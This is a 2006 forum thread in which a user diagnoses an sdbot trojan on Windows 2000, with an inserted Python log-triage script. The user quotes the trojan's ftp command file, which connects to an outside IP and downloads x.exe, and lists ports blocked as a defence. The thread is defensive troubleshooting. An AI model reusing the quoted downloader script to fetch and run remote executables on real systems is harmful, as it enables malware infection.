How to Block IRC on Windows 2000?

Is there a way to turn off/prohibit IRC on Windows?

     

lmo4103

2:26 am on Oct 11, 2006 (gmt 0)

5+ Year Member



Trojan irc.sdbot2 keeps planting files x.exe, i, a in system32.
Grisoft keeps catching it.

I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit

This is on a fresh installation of Windows 2000.
I have the Internet Explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not touching the PC, after a while it pops up again.

I just want to block unwanted files being deposited on my computer.

lmo4103

1:47 am on Oct 16, 2006 (gmt 0)

5+ Year Member



Throughout this thread, the "File and Printer Sharing for Microsoft Networks" has been un-checked for the dial-up connection, and there has not been any other network connection (net cable unplugged).

lmo4103

1:58 am on Oct 16, 2006 (gmt 0)

5+ Year Member



Deleted %windir%\system32\dllcache\ftp.exe
Renamed %windir%\system32\ftp.exe TO %windir%\system32\ftp_bak.exe
Created %windir%\system32\ftp.bat

.........................
%windir%\system32\ftp.bat
.........................
@echo off
echo %date:~4,10% %time:~0,8% %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 >> c:\foo.log

............
c:\foo.log
............
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 1:16:32 ftp -n -s:i
10/15/2006 1:30:58 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 11:32:55 ftp -n -s:o
10/15/2006 11:33:17 ftp -n -s:i
10/15/2006 11:33:42 ftp -n -s:o
10/15/2006 11:35:07 ftp -n -s:i
10/15/2006 17:11:16 ftp -n -s:i
10/15/2006 17:23:37 ftp -n -s:i
10/15/2006 21:48:45 ftp -n -s:i

...........
windump has
...........
21:48:28.387824 IP 221.208.208.90.32846 > walterh2.1027: UDP, length 459
21:48:28.387824 IP walterh2 > 221.208.208.90: ICMP walterh2 udp port 1027 unreachable, length 36

%windir%\system32\i appeared at 21:48:45

WHOIS Record For
221.208.208.90
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

WHOIS Record For
218.63.173.251
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
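
An added example, not part of the original post: Python that reads the `ftp.bat` wrapper log format shown above, parses an `ftp -s:` command file such as `i`, and reports which logged invocations fetched an executable and from where. The sample inputs are constructed from lines quoted in the post; the function names and the extension list are assumptions.

```python
import re
from datetime import datetime

# Constructed sample inputs, copied from values quoted in the post.
WRAPPER_LOG = ("10/15/2006 1:09:29 ftp -n -s:i\n"
               "10/15/2006 11:29:53 ftp -n -s:o\n"
               "10/15/2006 21:48:45 ftp -n -s:i\n")
SCRIPTS = {"i": "open 218.63.173.251 6497\nuser 1 1\nget x.exe\nquit\n"}

# date, time, program name (%0), then the remaining arguments (%1..%9)
LOG_RE = re.compile(
    r"^[ \t]*(\d{1,2}/\d{1,2}/\d{4}[ \t]+\d{1,2}:\d{2}:\d{2})[ \t]+\S+([^\r\n]*)",
    re.M)
EXEC_EXT = (".exe", ".dll", ".scr", ".bat", ".com", ".pif")  # assumed list

def parse_wrapper_log(text):
    """One (timestamp, script name) pair per logged invocation that used -s:."""
    events = []
    for m in LOG_RE.finditer(text):  # malformed lines simply do not match
        when = datetime.strptime(m.group(1), "%m/%d/%Y %H:%M:%S")
        for arg in m.group(2).split():
            if arg.lower().startswith("-s:"):
                events.append((when, arg[3:]))
    return events

def parse_ftp_script(text):
    """Remote endpoint and fetched file names from an ftp -s: command file."""
    info = {"host": None, "port": 21, "gets": []}
    for line in text.splitlines():
        parts = line.split()
        cmd = parts[0].lower() if parts else ""
        if cmd == "open" and len(parts) > 1:
            info["host"] = parts[1]
            if len(parts) > 2 and parts[2].isdigit():
                info["port"] = int(parts[2])
        elif cmd in ("get", "recv") and len(parts) > 1:
            info["gets"].append(parts[1])  # first argument is the remote name
    return info

def triage(log_text, scripts):
    """Join log events to recovered scripts and flag executable downloads."""
    findings = []
    for when, name in parse_wrapper_log(log_text):
        if name not in scripts:
            findings.append((when, name, "script not recovered"))
            continue
        s = parse_ftp_script(scripts[name])
        exes = [f for f in s["gets"] if f.lower().endswith(EXEC_EXT)]
        if exes:
            findings.append((when, name, f"{s['host']}:{s['port']} -> {', '.join(exes)}"))
    return findings
```

Each finding pairs an invocation time from the log with the endpoint and file named in the script, which gives the timestamps to look up in the windump capture.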

lmo4103

10:33 pm on Oct 17, 2006 (gmt 0)

5+ Year Member



blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports

Control Panel -> Administrative Tools -> Local Security Policy -> IP Security Policies on Local Machine
.. Manage IP Filter Lists
.. Create IP Security Policy
.... Block inbound UDP 1025,1026,1027 and TCP 1025,445,135

Have not seen that sdbot for a while...

This 33 message thread spans 2 pages: 33
 
